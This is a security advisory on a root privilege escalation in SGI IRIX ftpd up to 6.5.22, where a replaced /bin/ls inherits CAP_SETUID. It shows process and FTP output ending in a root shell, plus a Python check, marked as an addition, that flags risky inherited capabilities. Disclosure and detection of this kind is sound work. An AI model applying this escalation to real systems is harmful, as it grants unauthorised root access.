SGI IRIX <= 6.5.22 ftpd "/bin/ls" root privilege escalation
===========================================================
The default FTP daemon enabled in IRIX does not drop capabilities when
calling external binaries. ftpd calls "/bin/ls" (a symlink to /sbin/ls on
default systems) as a privileged process, and the child process then
inherits the parent's capabilities. An attacker who can change the
"/sbin/ls" binary can trivially obtain root permissions by exploiting
capability inheritance under SGI IRIX.
In the example below, the "demos" user has authenticated to the ftpd
service, and a popen() call (note: not itself exploitable) is used to
execute the "/bin/ls" binary when a directory listing is requested, such
as with the FTP LIST command.
root@indiegogo j:0 h:581 (21:39)[ /usr/demos/hacker/ ] # ps -aef | grep ftpd
demos 1490 247 0 21:34:39 ? 0:01 ftpd -l
root 1549 1346 0 21:39:16 pts/0 0:00 grep ftpd
root@indiegogo j:0 h:582 (21:39)[ /usr/demos/hacker/ ] # ps -aef | grep ls
demos 1540 1490 0 21:38:47 ? 0:12 /bin/ls -lA -R /
root 1551 1346 0 21:39:19 pts/0 0:00 grep ls
root@indiegogo j:0 h:583 (21:39)[ /usr/demos/hacker/ ] # ls -alP /proc/0000001540
-rw------- 1 demos demos 2068480 Mar 27 21:38 /proc/0000001540
[all= CAP_DAC_WRITE+pi CAP_SETGID+pi CAP_SETUID+pi CAP_AUDIT_WRITE+pi CAP_PRIV_PORT+pi CAP_CHROOT+pi]
The process list above shows that the "/bin/ls" process is running under the
low-privileged "demos" user account; however, a review of the process
capabilities shows that this binary has inherited several privileged
capabilities, including the desirable CAP_SETUID+pi capability that allows
the process to obtain root permissions. By using our irix-captest.c (modified
to directly request the permissions mask shown above) to replace the "/bin/ls"
binary, it is possible for the user to run commands with elevated privileges.
An example of exploitation can be seen in the following FTP client output.
lftp [email protected]:/tmp> ls -alR ./
req effective capabilities 10080800c04
req permitted capabilities 10080800c04
req inheritable caps 10080800c04
set capabilities result 0
effective capabilities 10080800c04
permitted capabilities 10080800c04
inheritable capabilities 10080800c04
cap_to_text() = all= CAP_DAC_WRITE+pi CAP_SETGID+pi CAP_SETUID+pi CAP_AUDIT_WRITE+pi CAP_PRIV_PORT+pi CAP_CHROOT+pi
uid=0(root) gid=0(sys)
lftp [email protected]:/tmp>
Note: since an attacker must be able to control "/sbin/ls" (or the system
default must have been changed) to exploit this issue, most attackers would
require an additional vulnerability to overwrite the "/bin/ls" binary. The
child process does not need to request capabilities explicitly; a direct call
to setuid() / setgid() will succeed in most cases due to the inheritance issue
described above.
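A defender-side check for the condition described above, added here as an example and not part of the original advisory: it parses the "ls -alP /proc/<pid>" output format shown earlier (an owner line followed by a bracketed cap_to_text() line) and flags non-root processes whose inheritable set carries a capability that a replaced child binary could use to escalate. The sample records are constructed, and the parser's reading of the cap_to_text() format is an assumption based only on the lines shown on this page.

```python
import re

# Capabilities whose presence in the INHERITABLE set of an unprivileged
# process lets a replaced child binary escalate, as the advisory describes.
RISKY_INHERITABLE = {"CAP_SETUID", "CAP_SETGID", "CAP_DAC_WRITE", "CAP_CHROOT"}

# Constructed sample records in the "ls -alP /proc/<pid>" format shown above:
# an owner line followed by the bracketed cap_to_text() line. The first record
# mirrors the advisory; the other two are made up to exercise the filter.
SAMPLE = """\
-rw------- 1 demos demos 2068480 Mar 27 21:38 /proc/0000001540
[all= CAP_DAC_WRITE+pi CAP_SETGID+pi CAP_SETUID+pi CAP_AUDIT_WRITE+pi CAP_PRIV_PORT+pi CAP_CHROOT+pi]
-rw------- 1 root sys 1024000 Mar 27 21:39 /proc/0000001346
[all= CAP_SETUID+pi]
-rw------- 1 demos demos 512000 Mar 27 21:40 /proc/0000001600
[all= CAP_AUDIT_WRITE+e]
"""

# "CAP_NAME+flags" where flags are some subset of e (effective), p (permitted),
# i (inheritable). Assumed from the page's output; not a full IRIX grammar.
CAP_RE = re.compile(r"(CAP_[A-Z_]+)\+([epi]+)")


def parse_cap_text(text):
    """Parse a cap_to_text() string ("all= CAP_X+pi ...") into {cap: set(flags)}."""
    return {name: set(flags) for name, flags in CAP_RE.findall(text)}


def parse_proc_listing(listing):
    """Yield (pid, owner, caps) from consecutive owner/capability line pairs."""
    lines = [l for l in listing.splitlines() if l.strip()]
    for owner_line, cap_line in zip(lines[0::2], lines[1::2]):
        fields = owner_line.split()
        owner = fields[2]                                  # ls -l owner column
        pid = int(fields[-1].rsplit("/", 1)[1])            # "/proc/0000001540" -> 1540
        yield pid, owner, parse_cap_text(cap_line.strip("[]"))


def risky_inheritance(listing):
    """Return {pid: sorted risky caps} for non-root processes holding a risky
    capability in their inheritable set (the condition the advisory exploits)."""
    findings = {}
    for pid, owner, caps in parse_proc_listing(listing):
        if owner == "root":
            continue
        hits = sorted(c for c, f in caps.items() if "i" in f and c in RISKY_INHERITABLE)
        if hits:
            findings[pid] = hits
    return findings


if __name__ == "__main__":
    for pid, caps in risky_inheritance(SAMPLE).items():
        print(f"pid {pid}: inheritable {', '.join(caps)}")
```

On the sample input only pid 1540 (the ftpd-spawned ls running as "demos") is reported; the root-owned process is skipped and the one with only an effective CAP_AUDIT_WRITE has nothing inheritable to flag.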
Happy Hacking!
-- Hacker Fantastic
(https://hacker.house)